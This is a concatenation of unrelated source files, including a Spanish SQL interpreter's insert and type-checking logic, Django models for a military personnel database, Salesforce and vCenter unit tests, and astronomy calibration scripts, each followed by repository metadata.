todobien = comprobar_tipos(dataainsertar, i, insertinto.values, data, entornoTabla.simbolos,
entornoTabla, consola, exceptions, BD, simbolo_tabla,ts)
i = i + 1
else:
dataainsertar.append(str(None))
if not todobien:
consola.append("No se insertaron los datos, columnas inconsistentes")
todobien = False
break
contadoraux =contadoraux+1
if todobien:
insert(BD.id, simbolo_tabla.id, dataainsertar)
consola.append(f"insert en la tabla {insertinto.id}, exitoso\n")
else:
consola.append(f"Campos insconsistentes")
consola.append(f"insert en la tabla {insertinto.id}, exitoso\n")
else:
consola.append(f"datos dectectados como no nulos")
todoBien=True
else:
print("caso 2")
if len(insertinto.values) == len(entornoTabla.simbolos):
i =0
todobien = True
for data in entornoTabla.simbolos:
todobien = comprobar_tipos(dataainsertar,i,insertinto.values,data,entornoTabla.simbolos,entornoTabla,consola,exceptions,BD,simbolo_tabla,ts)
if not todobien:
consola.append("No se insertaron los datos, columnas inconsistentes")
todobien= False
break
i=i+1
if todobien:
insert(BD.id,simbolo_tabla.id,dataainsertar)
consola.append(f"insert en la tabla {insertinto.id}, exitoso\n")
else:
consola.append(f"Campos insconsistentes")
else:
consola.append(f"La cantidad de columnas esperadas es de {len(entornoTabla.simbolos)} para insersar en tabla {insertinto.id}")
exceptions.append(f"Error semantico-22023-invalid_parameter_value -{insertinto.fila}-{insertinto.columna}")
else:
consola.append(f"42P01 undefined_table, no existe la tabla {insertinto.id}")
exceptions.append(f"Error semantico-42P01- 42P01 undefined_table, no existe la tabla {insertinto.id}-fila-columna")
else:
consola.append("42P12 invalid_database_definition, Error al insertar\n")
consola.append("22005 error_in_assignment, No se ha seleccionado una BD\n")
exceptions.append("Error semantico-22005 error_in_assignment-No se ha seleccionado DB-fila-columna")
def comprobar_tipos(datainsertar,index,lista_valores,campo,lista_tabla,ts,Consola,exception,bd,tabla,globall):
print("estoy aqui !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
todobien = False
# print(lista_valores[index].valor)
# print(date.fromisoformat(lista_valores[index].valor))
# print(isinstance(date.fromisoformat(lista_valores[index].valor),date))
# print('DATE' in str(lista_tabla.get(campo).tipo).upper())
datafinal = None
if isinstance(lista_valores[index],Instruccion):
datafinal = Expresion.Resolver(lista_valores[index],ts,Consola,exception)
datainsertar.append(datafinal)
else:
datafinal = lista_valores[index].valor
datainsertar.append(datafinal)
print(datafinal)
if isinstance(datafinal,int) and 'INTEGER' in str(lista_tabla.get(campo).tipo).upper():
todobien = True
todobien = comprobarcheck(lista_tabla.get(campo).Entorno,1,datafinal,lista_tabla.get(campo).id,ts,Consola,exception)
todobien = comprobar_caracteristicas(lista_tabla.get(campo).valor,datafinal,Consola,exception,bd,tabla,index)
elif isinstance(datafinal,float) and 'DOUBLE' in str(lista_tabla.get(campo).tipo).upper() or 'DECIMAL' in str(lista_tabla.get(campo).tipo).upper():
todobien = True
todobien = comprobarcheck(lista_tabla.get(campo).Entorno,1,datafinal,lista_tabla.get(campo).id,ts,Consola,exception)
todobien = comprobar_caracteristicas(lista_tabla.get(campo).valor, datafinal, Consola, exception, bd, tabla, index)
elif str(datafinal).upper() == 'TRUE' or str(datafinal).upper() == 'FALSE' and 'BOOLEAN' in str(lista_tabla.get(campo).tipo).upper():
todobien = True
todobien = comprobarcheck(lista_tabla.get(campo).Entorno,1,datafinal,lista_tabla.get(campo).id,ts,Consola,exception)
todobien = comprobar_caracteristicas(lista_tabla.get(campo).valor, datafinal, Consola, exception, bd, tabla,
index)
elif isinstance(datafinal,str) and 'TEXT' in str(lista_tabla.get(campo).tipo).upper():
todobien = True
todobien = comprobarcheck(lista_tabla.get(campo).Entorno,1,datafinal,lista_tabla.get(campo).id,ts,Consola,exception)
todobien = comprobar_caracteristicas(lista_tabla.get(campo).valor, datafinal, Consola, exception, bd, tabla,
index)
elif isinstance(str(datafinal),str) and 'VARCHAR' in str(lista_tabla.get(campo).tipo).upper() or 'CHARACTERVARYING' in str(lista_tabla.get(campo).tipo).upper() or 'CHARACTER' in str(lista_tabla.get(campo).tipo).upper() or 'CHAR' in str(lista_tabla.get(campo).tipo).upper():
todobien = True
cantidad = str(lista_tabla.get(campo).tipo).split("-")[1]
if len(str(datafinal)) <= int(cantidad):
todobien = True
todobien = comprobarcheck(lista_tabla.get(campo).Entorno,1,str(datafinal),lista_tabla.get(campo).id,ts,Consola,exception)
todobien = comprobar_caracteristicas(lista_tabla.get(campo).valor, datafinal, Consola, exception, bd, tabla,
index)
else:
todobien = False
elif isinstance(datafinal,float) and 'MONEY' in str(lista_tabla.get(campo).tipo).upper():
todobien = True
todobien = comprobarcheck(lista_tabla.get(campo).Entorno,1,datafinal,lista_tabla.get(campo).id,ts,Consola,exception)
todobien = comprobar_caracteristicas(lista_tabla.get(campo).valor, datafinal, Consola, exception, bd, tabla,
index)
elif isinstance(datafinal,int) and 'MONEY' in str(lista_tabla.get(campo).tipo).upper():
todobien = True
try:
todobien = comprobarcheck(lista_tabla.get(campo).Entorno,1,datafinal,lista_tabla.get(campo).id,ts,Consola,exception)
todobien = comprobar_caracteristicas(lista_tabla.get(campo).valor, datafinal, Consola, exception, bd, tabla,
index)
except:
todobien = False
elif 'DATE' in str(lista_tabla.get(campo).tipo).upper():
try:
#todobien= isinstance(date.fromisoformat(str(datafinal)), date)
todobien = comprobarcheck(lista_tabla.get(campo).Entorno, 1, datafinal, lista_tabla.get(campo).id, ts,Consola, exception)
todobien = comprobar_caracteristicas(lista_tabla.get(campo).valor, datafinal, Consola, exception, bd,
tabla, index)
except:
print("error de tipo")
todobien = False
else:
try:
print("%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%5")
print(lista_tabla.get(campo).tipo)
for data in globall.simbolos:
print(":: ",data)
if globall.validar_sim(str(lista_tabla.get(campo).tipo).lower()) == 1:
print("$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$4")
for data in ts.simbolos:
print(";;; ",data)
simbolo_enumo = globall.buscar_sim(str(lista_tabla.get(campo).tipo).lower())
if datafinal in simbolo_enumo.valor:
todobien = True
Consola.append("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!11")
else:
print("no encotrado")
except:
todobien= False
return todobien
def comprobarcheck(expresion,data,valor,nombre_columna,ts,Consola,exception):
valor_retorno=True
print("que pedo",data)
#if data == 1:
print("-> ",expresion)
if expresion != None:
for datos in expresion:
dataiz = datos.iz
datade = datos.dr
operador= datos.operador
if nombre_columna != dataiz.id:
valor_retorno=False
break
valor_retorno = Expresion.Resolver(Expresion(Primitivo(valor,1,1),datade,operador,1,1),ts,Consola,exception)
return valor_retorno
def comprobar_caracteristicas(tipo_caracteristica,data,Consola,Exception,nombre_bd,nombre_tabla,posicion):
devolver=True
print("->>>>>",tipo_caracteristica)
if tipo_caracteristica != None:
print("aqui estamos")
for caracteristica in tipo_caracteristica:
print(caracteristica)
if "NOTNULL" in str(caracteristica):
if data == None:
Consola.append("Dato encontrado con not null, debe llevar un valor")
devolver=False
break
elif "UNIQUE" in str(caracteristica) or "PRIMARYKEY" in str(caracteristica):
print(nombre_bd.id,nombre_tabla.id)
datas = extractTable(nombre_bd.id,nombre_tabla.id)
print("unique or primary -> ",posicion)
for fila in datas:
if str(fila[posicion])== str(data):
devolver= False
Consola.append("Constraint unique active")
print(fila[posicion])
print(data)
return devolver | 44.622517 | 277 | 0.557955 | [
"MIT"
] | 201503484/tytus | parser/team21/Analisis_Ascendente/Instrucciones/Insert/insert.py | 13,476 | Python |
import pytest
from vnc_api import vnc_api
from cvfm import services
@pytest.fixture
def dvs_service(vcenter_api_client, vnc_api_client, database):
return services.DistributedVirtualSwitchService(
vcenter_api_client, vnc_api_client, database
)
@pytest.fixture
def port_1():
port = vnc_api.Port("port-1")
esxi_port_info = vnc_api.ESXIProperties(dvs_name="dvs-1")
port.set_esxi_port_info(esxi_port_info)
return port
@pytest.fixture
def port_2():
port = vnc_api.Port("port-2")
esxi_port_info = vnc_api.ESXIProperties(dvs_name="dvs-2")
port.set_esxi_port_info(esxi_port_info)
return port
@pytest.fixture
def port_3():
port = vnc_api.Port("port-2")
esxi_port_info = vnc_api.ESXIProperties()
port.set_esxi_port_info(esxi_port_info)
return port
@pytest.fixture
def port_4():
return vnc_api.Port("port-4")
def test_populate_db(
dvs_service, database, vnc_api_client, port_1, port_2, port_3, port_4
):
database.clear_database()
ports = [port_1, port_2, port_3, port_4]
json_ports = [
port.serialize_to_json(field_names="esxi_port_info") for port in ports
]
for port in json_ports:
if port.get("esxi_port_info"):
port["esxi_port_info"] = port["esxi_port_info"].exportDict(
name_=None
)
vnc_api_client.read_all_ports.return_value = json_ports
dvs_service.populate_db_with_supported_dvses()
assert database.is_dvs_supported("dvs-1") is True
assert database.is_dvs_supported("dvs-2") is True
assert database.is_dvs_supported("dvs-3") is False
| 24.830769 | 78 | 0.715613 | [
"Apache-2.0"
] | atsgen/tf-vcenter-fabric-manager | tests/unit/services/test_dvs_service.py | 1,614 | Python |
from django.db import models
from osoba.models import ServiseID, Company
from django.utils.translation import gettext as _
class SHPK(models.Model):
name = models.CharField(max_length=512, verbose_name=_('Name'))
short_name = models.CharField(max_length=512, verbose_name=_('Short name'))
def __str__(self):
return self.name[:50]
class Meta:
verbose_name = _('SHPK')
verbose_name_plural = _('SHPK')
class ZvannyaName(models.Model):
zv_id = models.AutoField(primary_key=True)
zv_name = models.TextField()
zv_short_name = models.CharField(max_length=20)
def __str__(self):
return '{}__{}'.format(self.zv_id, self.zv_name)
class Meta:
managed = False
db_table = 'zvannya_name'
class Staff(models.Model):
# Штатка
#порядковий номер в штатці
unicum = models.PositiveBigIntegerField(verbose_name= _('Unic number'), blank=True)
company = models.ForeignKey(Company, on_delete=models.CASCADE, blank=True, verbose_name= _('Company'))
name = models.CharField(max_length=512, verbose_name=_('Name'))
shpk = models.ForeignKey(SHPK, on_delete=models.CASCADE, blank=True, verbose_name= _('shpk'))
ocoba = models.ForeignKey(ServiseID, on_delete=models.CASCADE, blank=True, verbose_name= _('ocoba'), null=True)
vos = models.CharField(max_length=512, verbose_name= _('VOS'))
poz = models.CharField(max_length=512, verbose_name= _('pozyvnyy'), blank=True)
salary = models.PositiveBigIntegerField(verbose_name= _('salary'), blank=True)
tariff_category = models.PositiveBigIntegerField(verbose_name= _('tariff category'), blank=True)
vacant = models.BooleanField(verbose_name= _('Vacant'), blank=True, null=True, default=True)
def __str__(self):
return self.name[:50]
class Meta:
verbose_name = _('Staff')
verbose_name_plural = _('Staff')
class Adresa(models.Model):
adr_id = models.AutoField(primary_key=True)
adr_n_id = models.IntegerField()
adresa = models.CharField(max_length=360)
class Meta:
managed = False
db_table = 'adresa'
class Nakaz(models.Model):
nak_id = models.AutoField(primary_key=True)
nak_n_id = models.IntegerField()
nak_status_id = models.IntegerField()
zvidky = models.IntegerField()
kudy = models.IntegerField()
nak_data = models.DateField( blank=True, null=True)
nak_nomer = models.IntegerField()
povern = models.DateField( blank=True, null=True)
tmp = models.IntegerField()
class Meta:
managed = False
db_table = 'nakaz'
class NakazNomer(models.Model):
n_nak_id = models.AutoField(primary_key=True)
n_nak_data = models.DateField( blank=True, null=True)
n_nak_nomer = models.IntegerField()
class Meta:
managed = False
db_table = 'nakaz_nomer'
class NakazPlace(models.Model):
nak_place_id = models.AutoField(primary_key=True)
nak_place_name = models.CharField(max_length=120)
class Meta:
managed = False
db_table = 'nakaz_place'
class PosadaName(models.Model):
pos_id = models.AutoField(primary_key=True)
pos_name = models.TextField()
def __str__(self):
return '{}__{}'.format(self.pos_id, self.pos_name[:50])
class Meta:
managed = False
db_table = 'posada_name'
class PidrozdilName(models.Model):
p_id = models.AutoField(primary_key=True)
por_nomer = models.IntegerField()
p_name = models.TextField()
p_short_name = models.CharField(max_length=32)
p_full_name = models.CharField(max_length=200)
active = models.IntegerField()
def __str__(self):
return '{}__{}'.format(self.p_id, self.p_name[:50])
class Meta:
managed = False
db_table = 'pidrozdil_name'
class Shtatka(models.Model):
pos_id = models.AutoField(primary_key=True)
p = models.ForeignKey(PidrozdilName, to_field='p_id', on_delete=models.PROTECT, related_name='+' )
sh = models.ForeignKey(PosadaName, to_field='pos_id', on_delete=models.PROTECT, related_name='+' )
zv_sh = models.ForeignKey(ZvannyaName, to_field='zv_id', on_delete=models.PROTECT, related_name='+' )
dopusk = models.CharField(max_length=1)
vos = models.CharField(max_length=12)
oklad = models.CharField(max_length=12)
vidsotok = models.IntegerField()
nomer_kniga = models.IntegerField()
class Meta:
managed = False
db_table = 'shtatka'
def __str__(self):
return '{}__{}'.format(self.pos_id, self.sh)
class OsvitaName(models.Model):
osv_name_id = models.AutoField(primary_key=True)
osv_name = models.CharField(max_length=100)
def __str__(self):
return '{}__{}'.format(self.osv_name_id, self.osv_name)
class Meta:
managed = False
db_table = 'osvita_name'
class SimStanName(models.Model):
s_stan_name_id = models.AutoField(primary_key=True)
s_stan_name = models.CharField(max_length=30)
def __str__(self):
return '{}__{}'.format(self.s_stan_name_id, self.s_stan_name)
class Meta:
managed = False
db_table = 'sim_stan_name'
class StatsName(models.Model):
s_stats_name_id = models.AutoField(primary_key=True)
s_stats_name = models.CharField(max_length=1)
def __str__(self):
return '{}__{}'.format(self.s_stats_name_id, self.s_stats_name)
class Meta:
managed = False
db_table = 'stats_name'
class StatusName(models.Model):
s_id = models.AutoField(primary_key=True)
s_name = models.CharField(max_length=128)
def __str__(self):
return '{}__{}'.format(self.s_id, self.s_name)
class Meta:
managed = False
db_table = 'status_name'
class Name(models.Model):
n_id= models.AutoField(primary_key=True)
name = models.TextField()
short_name = models.TextField()
pseudo = models.CharField(max_length=128)
zv = models.ForeignKey(ZvannyaName, to_field='zv_id', on_delete=models.PROTECT, related_name='+' )
data_zv = models.CharField(max_length=100)
pos = models.ForeignKey(Shtatka, to_field='pos_id', on_delete=models.PROTECT, related_name='+' )
pos_id_old = models.IntegerField(null=True, blank=True)
p_id = models.IntegerField() #wtf?
kontr = models.IntegerField(null=True, blank=True)
data_narod = models.DateField( blank=True, null=True)
adresa_nar = models.CharField(max_length=200)
data_mob = models.DateField( blank=True, null=True)
vijskomat = models.CharField(max_length=100)
data_zarah = models.DateField( blank=True, null=True)
nomer_nakazu_ok = models.CharField(max_length=10)
data_nakazu_ok = models.DateField( blank=True, null=True)
chiy_nakaz = models.CharField(max_length=50)
kontrakt = models.DateField( blank=True, null=True)
kontrakt_strok = models.CharField(max_length=50)
kontrakt_zak = models.DateField( blank=True, null=True)
nomer_nakazu = models.IntegerField()#wtf?
data_zviln = models.DateField( blank=True, null=True)
nomer_nakazu_zviln = models.IntegerField()#wtf?
nomer_pasp = models.CharField(max_length=100)
code_nomer = models.CharField(max_length=10)
voen_nomer = models.CharField(max_length=25)
grupa_krovi = models.CharField(max_length=15)
osvita = models.ForeignKey(OsvitaName, to_field='osv_name_id', on_delete=models.PROTECT, related_name='+' )
specialnist = models.CharField(max_length=500)
zvp = models.CharField(max_length=100)
fahova = models.CharField(max_length=100)
liderstvo = models.CharField(max_length=100)
perem = models.CharField(max_length=50)
persh_kontr = models.CharField(max_length=50)
ozdor = models.CharField(max_length=50)
mdspp = models.CharField(max_length=50)
sim_stan = models.ForeignKey(SimStanName, to_field='s_stan_name_id', on_delete=models.PROTECT, related_name='+' )
stats = models.ForeignKey(StatsName, to_field='s_stats_name_id', on_delete=models.PROTECT, related_name='+' )
status = models.ForeignKey(StatusName, to_field='s_id', on_delete=models.PROTECT, related_name='+' )
status2 = models.IntegerField()
notes = models.TextField()
notes1 = models.TextField()
def __str__(self):
return self.name[:50]
class Meta:
managed = False
db_table = 'name'
class Peremish(models.Model):
perem_id = models.AutoField(primary_key=True)
perem_n_id = models.IntegerField()
perem_status_id = models.IntegerField()
zvidky = models.IntegerField()
kudy = models.IntegerField()
perem_data = models.DateField( blank=True, null=True)
nakaz_id = models.IntegerField()
povern = models.DateField( blank=True, null=True)
class Meta:
managed = False
db_table = 'peremish'
class Phones(models.Model):
ph_id = models.AutoField(primary_key=True)
n_id = models.IntegerField()
ph_nomer = models.TextField()
class Meta:
managed = False
db_table = 'phones'
class PidrozdilId(models.Model):
p_id = models.AutoField(primary_key=True)
p_parent_id = models.IntegerField()
isparent = models.IntegerField()
class Meta:
managed = False
db_table = 'pidrozdil_id'
class Priznach(models.Model):
prizn_id = models.AutoField(primary_key=True)
prizn_n_id = models.IntegerField()
prizn_data = models.DateField( blank=True, null=True)
prizn_pos_id = models.IntegerField()
class Meta:
managed = False
db_table = 'priznach'
class PriznachOld(models.Model):
prizn_id = models.AutoField(primary_key=True)
prizn_n_id = models.IntegerField()
prizn_data = models.DateField( blank=True, null=True)
prizn_pos_id = models.IntegerField()
class Meta:
managed = False
db_table = 'priznach_old'
class PriznachOld2(models.Model):
prizn_id = models.AutoField(primary_key=True)
prizn_n_id = models.IntegerField()
prizn_data = models.DateField( blank=True, null=True)
prizn_pos_id = models.IntegerField()
class Meta:
managed = False
db_table = 'priznach_old_2'
class Ridny(models.Model):
rid_id = models.AutoField(primary_key=True)
rid_n_id = models.IntegerField()
rid_name_id = models.IntegerField()
rid_name = models.CharField(max_length=200)
rid_data_nar = models.DateField( blank=True, null=True)
rid_phone = models.IntegerField()
rid_notes = models.CharField(max_length=500)
class Meta:
managed = False
db_table = 'ridny'
class RidnyName(models.Model):
rid_name_id = models.AutoField(primary_key=True)
rid_name_name = models.CharField(max_length=50)
class Meta:
managed = False
db_table = 'ridny_name'
class ShtatkaOld(models.Model):
pos_id = models.AutoField(primary_key=True)
p_id = models.IntegerField()
sh_id = models.IntegerField()
zv_sh_id = models.IntegerField()
vos = models.CharField(max_length=12)
oklad = models.CharField(max_length=12)
nomer_kniga = models.IntegerField()
class Meta:
managed = False
db_table = 'shtatka_old'
class ShtatkaOld2(models.Model):
pos_id = models.AutoField(primary_key=True)
p_id = models.IntegerField()
sh_id = models.IntegerField()
zv_sh_id = models.IntegerField()
vos = models.CharField(max_length=12)
oklad = models.CharField(max_length=12)
nomer_kniga = models.IntegerField()
class Meta:
managed = False
db_table = 'shtatka_old_2'
class Table32(models.Model):
col_1 = models.CharField(db_column='COL 1', max_length=10, blank=True, null=True) # Field name made lowercase. Field renamed to remove unsuitable characters.
col_2 = models.IntegerField(db_column='COL 2', blank=True, null=True) # Field name made lowercase. Field renamed to remove unsuitable characters.
class Meta:
managed = False
db_table = 'table 32'
class Table35(models.Model):
col_1 = models.CharField(db_column='COL 1', max_length=10, blank=True, null=True) # Field name made lowercase. Field renamed to remove unsuitable characters.
col_2 = models.IntegerField(db_column='COL 2', blank=True, null=True) # Field name made lowercase. Field renamed to remove unsuitable characters.
class Meta:
managed = False
db_table = 'table 35'
class Temp(models.Model):
number_1 = models.IntegerField(db_column='1') # Field renamed because it wasn't a valid Python identifier.
number_2 = models.TextField(db_column='2') # Field renamed because it wasn't a valid Python identifier.
class Meta:
managed = False
db_table = 'temp'
class Tmp(models.Model):
number_1 = models.IntegerField(db_column='1') # Field renamed because it wasn't a valid Python identifier.
number_2 = models.TextField(db_column='2') # Field renamed because it wasn't a valid Python identifier.
class Meta:
managed = False
db_table = 'tmp'
class Vysluga(models.Model):
vys_id = models.AutoField(primary_key=True)
vys_n_id = models.IntegerField()
vys_data_mob = models.DateField( blank=True, null=True)
vys_data_zvil = models.DateField( blank=True, null=True)
class Meta:
managed = False
db_table = 'vysluga'
class VyslugaNormy(models.Model):
rokiv = models.IntegerField()
nadbavka = models.IntegerField()
class Meta:
managed = False
db_table = 'vysluga_normy'
class VyslugaZv(models.Model):
vys_zv_id = models.AutoField(primary_key=True)
vys_zv_n_id = models.IntegerField()
data_zv = models.DateField( blank=True, null=True)
class Meta:
managed = False
db_table = 'vysluga_zv'
class ZbrStatusName(models.Model):
zbr_status_id = models.AutoField(primary_key=True)
zbr_status_name = models.CharField(max_length=20)
class Meta:
managed = False
db_table = 'zbr_status_name'
class Zbroya(models.Model):
zbr_id = models.AutoField(primary_key=True)
zbr_type = models.IntegerField()
nomer = models.CharField(max_length=128)
n_id = models.IntegerField()
magazin = models.IntegerField()
zbr_status = models.IntegerField()
zbr_note = models.CharField(max_length=256)
class Meta:
managed = False
db_table = 'zbroya'
class ZbroyaAll(models.Model):
zbr_type = models.IntegerField()
nomer = models.CharField(max_length=128)
rota = models.IntegerField()
class Meta:
managed = False
db_table = 'zbroya_all'
class ZbroyaName(models.Model):
zbr_id = models.AutoField(primary_key=True)
zbr_name = models.CharField(max_length=128)
class Meta:
managed = False
db_table = 'zbroya_name'
class ZbroyaSklad(models.Model):
zbr_type = models.IntegerField()
nomer = models.CharField(max_length=256)
class Meta:
managed = False
db_table = 'zbroya_sklad'
class ZvGrupaName(models.Model):
zv_gr_id = models.AutoField(primary_key=True)
zv_gr_name = models.CharField(max_length=20)
class Meta:
managed = False
db_table = 'zv_grupa_name'
class ZvannyaId(models.Model):
zv_id = models.IntegerField(unique=True)
zv_gr_id = models.IntegerField()
zv_okl = models.IntegerField()
class Meta:
managed = False
db_table = 'zvannya_id'
class ZvilnComent(models.Model):
zv_com_id = models.AutoField(primary_key=True)
zv_com_n_id = models.IntegerField()
zv_coment = models.CharField(max_length=500)
class Meta:
managed = False
db_table = 'zviln_coment'
class Kontrakt(models.Model):
kontrakt_com_id = models.AutoField(primary_key=True)
kontrakt_com_n = models.ForeignKey(Name, to_field='n_id', on_delete=models.PROTECT, related_name='+')# models.IntegerField()
kontrakt_date = models.DateField( blank=True, null=True)
kontrakt_srok = models.IntegerField()
kontrakt_zak = models.DateField( blank=True, null=True)
class Meta:
managed = False
db_table = 'kontrakt'
| 30.308851 | 162 | 0.692929 | [
"Apache-2.0"
] | VadymRud/zampol | zampol/staff/models.py | 16,122 | Python |
import unittest
from mock import Mock, patch
from cumulusci.salesforce_api.utils import get_simple_salesforce_connection
from cumulusci.core.exceptions import ServiceNotConfigured
from cumulusci import __version__
class TestSalesforceApiUtils(unittest.TestCase):
@patch("simple_salesforce.Salesforce")
def test_connection(self, mock_sf):
org_config = Mock()
proj_config = Mock()
service_mock = Mock()
service_mock.client_id = "TEST"
proj_config.keychain.get_service.return_value = service_mock
get_simple_salesforce_connection(proj_config, org_config)
mock_sf.assert_called_once_with(
instance_url=org_config.instance_url,
session_id=org_config.access_token,
version=proj_config.project__package__api_version,
)
mock_sf.return_value.headers.setdefault.assert_called_once_with(
"Sforce-Call-Options", "client={}".format(service_mock.client_id)
)
@patch("simple_salesforce.Salesforce")
def test_connection__explicit_api_version(self, mock_sf):
org_config = Mock()
proj_config = Mock()
service_mock = Mock()
service_mock.client_id = "TEST"
proj_config.keychain.get_service.return_value = service_mock
get_simple_salesforce_connection(proj_config, org_config, api_version="42.0")
mock_sf.assert_called_once_with(
instance_url=org_config.instance_url,
session_id=org_config.access_token,
version="42.0",
)
mock_sf.return_value.headers.setdefault.assert_called_once_with(
"Sforce-Call-Options", "client={}".format(service_mock.client_id)
)
@patch("simple_salesforce.Salesforce")
def test_connection__no_connected_app(self, mock_sf):
org_config = Mock()
proj_config = Mock()
proj_config.keychain.get_service.side_effect = ServiceNotConfigured
get_simple_salesforce_connection(proj_config, org_config)
mock_sf.return_value.headers.setdefault.assert_called_once_with(
"Sforce-Call-Options",
"client={}".format("CumulusCI/{}".format(__version__)),
)
| 37.322034 | 85 | 0.702997 | [
"BSD-3-Clause"
] | bethbrains/CumulusCI | cumulusci/salesforce_api/tests/test_utils.py | 2,202 | Python |
# -*- coding: utf-8 -*-
"""Define general test helper attributes and utilities."""
import os
import sys
TRAVIS=os.getenv("TRAVIS_PYTHON_VERSION") is not None
PYTHON_VERSION = "%s.%s" % (sys.version_info.major, sys.version_info.minor)
TMP_DIR="/tmp"
| 27.777778 | 75 | 0.728 | [
"MIT"
] | bobatsar/moviepy | tests/test_helper.py | 250 | Python |
import ipdb
import medis.speckle_nulling.sn_hardware as hardware
import medis.speckle_nulling.sn_preprocessing as pre
import numpy as np
import os
import astropy.io.fits as pf
import medis.speckle_nulling.sn_filehandling as flh
from configobj import ConfigObj
def build_median(imagelist, outputfile = None):
"""Takes a list of image paths and builds a median image"""
first = True
for image in imagelist:
hdulist= pf.open(image)
data = pre.combine_quadrants(hdulist)
#data= hdulist[0].data
#data = pre.combine_quadrants(data)
#filesused.append(image+'; ')
if first:
imcube = data[:,:,np.newaxis]
first = False
else:
np.concatenate((imcube, data[:,:,np.newaxis]), axis=2)
hdulist.close()
medimage = np.median(imcube, axis=2)
if outputfile is not None:
print "Writing median image to "+outputfile
strfiles = [x+'; ' for x in imagelist]
strfilesused = ("Files used to create master image: "+
''.join(strfiles))
flh.writeout(medimage, outputfile,
comment = strfilesused)
return medimage
def build_master_flat(mfminusmd, badpix=None,
kernelsize = 9,
outputfile = 'masterflat.fits',
removezeros = True):
"""removes bad pixels from a background subtracted master flat"""
im1 = pre.removebadpix(mfminusmd, badpix, kernelsize=kernelsize)
ans = im1/np.mean(im1)
if removezeros:
ans=pre.removebadpix(ans, ans==0, kernelsize = kernelsize)
flh.writeout(ans, outputfile)
return ans
def build_master_dark(rawdark, badpix = None, outputfile='masterdark.fits'):
ans=pre.removebadpix(rawdark, badpix)
flh.writeout(ans, outputfile)
return ans
def build_badpixmask(image,
method='gaussfit',outputfile = 'badpix.fits'):
if method == 'gaussfit':
masterbadpixelmask = pre.locate_badpix(image, sigmaclip = 2.5)
print "Writing badpix image to "+outputfile
flh.writeout(masterbadpixelmask, outputfile)
return masterbadpixelmask
if __name__ == "__main__":
hardwareconfigfile = 'speckle_instruments.ini'
configfilename = 'speckle_null_config.ini'
config = ConfigObj(configfilename)
bgdconfig= config['BACKGROUNDS_CAL']
outputdir = config['BACKGROUNDS_CAL']['dir']
pharo = hardware.PHARO_COM('PHARO',
configfile = hardwareconfigfile)
print ("\n\n\n\nThis script is meant to tell PHARO to take a bunch of backgrounds,\n darks, and flats, then assemble them into the correctly formatted 1024x1024 region \nthat we care about, and place them in the following directory:")
print config['BACKGROUNDS_CAL']['dir']
print ('\n\n\n\nIf this script does not work, my advice would be to bypass it completely and do it manually take some flats, backgrounds and darks. \nAssemble them yourselves (see sn_preprocessing.py), \nparticularly combine_quadrants, locate_badpix, and save them as masterflat.fits, masterdark.fits, badpix.fits in the same directory mentioned above')
filetypes = ['backgrounds',
'flats', 'flatdarks']
for ftype in filetypes:
imnames = []
commandstring = ("\n\n\n\nSet up Pharo to the configurations to take "+ftype.upper()+" then hit any key. ")
s= raw_input(commandstring)
if ftype == 'backgrounds':
for i in range(int(config['BACKGROUNDS_CAL']['N'])):
fname = pharo.take_src_return_imagename(
exptime = bgdconfig['bgdtime'])
imnames.append(fname)
print ftype.upper()+" taken so far: "
print imnames
background = build_median(imnames,
outputfile = os.path.join(outputdir, 'medbackground.fits'))
ipdb.set_trace()
if ftype == 'flats':
for i in range(int(config['BACKGROUNDS_CAL']['N'])):
fname = pharo.take_src_return_imagename(
exptime = bgdconfig['flattime'])
imnames.append(fname)
print ftype.upper()+" taken so far: "
print imnames
med_flat = build_median(imnames, outputfile=os.path.join(outputdir, 'medflat.fits'))
#XXXX fix flat fielding
if ftype == 'flatdarks':
for i in range(int(config['BACKGROUNDS_CAL']['N'])):
fname = pharo.take_src_return_imagename(
exptime = bgdconfig['flattime'])
imnames.append(fname)
print ftype.upper()+" taken so far: "
print imnames
med_flatdark = build_median(imnames, outputfile=os.path.join(outputdir, 'medflatdark.fits'))
bp = build_badpixmask(med_flatdark,
outputfile = os.path.join(outputdir,'badpix.fits'))
#bp = build_badpixmask(targ_bkgd-cal_bkgd,
# outputfile = os.path.join(outputdir,'badpix.fits'))
mf = build_master_flat(med_flat-med_flatdark, badpix=bp,
outputfile = os.path.join(outputdir,'masterflat.fits'))
| 43.040984 | 358 | 0.6235 | [
"MIT"
] | RupertDodkins/MEDIS | medis/speckle_nulling/take_flats_and_darks_old.py | 5,251 | Python |
class Solution:
def canPlaceFlowers(self, flowerbed, n: int) -> bool:
# Even with an empty list, the maximum amount we can place
# is len(flowerbed) // 2 (+ 1 if odd, +0 if even)
length = len(flowerbed)
if n > (length // 2) + 1 * (length & 1):
return False
# bail early. fits everywhere.
if n == 0:
return True
# bail early if [0].
if length == 1:
return flowerbed[0] == 0
# Start counting from 2 pos if [_, 0, ...]
if flowerbed[1] == 0:
# but decrement n if [0, 0, ...]
if flowerbed[0] == 0:
n -= 1
if n == 0:
return True
i = 2
# Start counting from 3rd pos if [_, 1, ...]
else:
i = 3
# Go through the flower bed and check adjacent positions.
while i < length:
# if available, check adjacent.
if flowerbed[i] == 0:
j, k = i - 1, i + 1
# previous is 0, check next and jump appropriately.
if flowerbed[j] == 0:
if k < length:
if flowerbed[k] == 0:
n -= 1
else:
# jump over and go two steps over
# to try that slot.
i += 3
continue
elif k == length:
return n <= 1
if n == 0:
return True
# go two positions over. Either we filled it or it was
# already a one.
i += 2
return n == 0
| 36.125 | 67 | 0.398501 | [
"Unlicense"
] | DimitrisJim/leet | Python/Algorithms/605.py | 1,734 | Python |
def belong(in_list1: list, in_list2: list) -> list:
"""
Check wheter or not all the element in list in_list1 belong into in_list2
:param in_list1: the source list
:param in_list2: the target list where to find the element in in_list1
:return: return True if the statement is verified otherwise return False
"""
return all(element in in_list2 for element in in_list1)
if __name__ == "__main__":
print(belong([1,2,3,4],[4,5,6,5,7,0,4,2,3])) | 42.818182 | 77 | 0.698514 | [
"MIT"
] | angelmpalomares/ModelAndLanguagesForBioInformatics | Python/List/14.belong.py | 471 | Python |
#
# PySNMP MIB module CISCO-WAN-FR-CONN-MIB (http://snmplabs.com/pysmi)
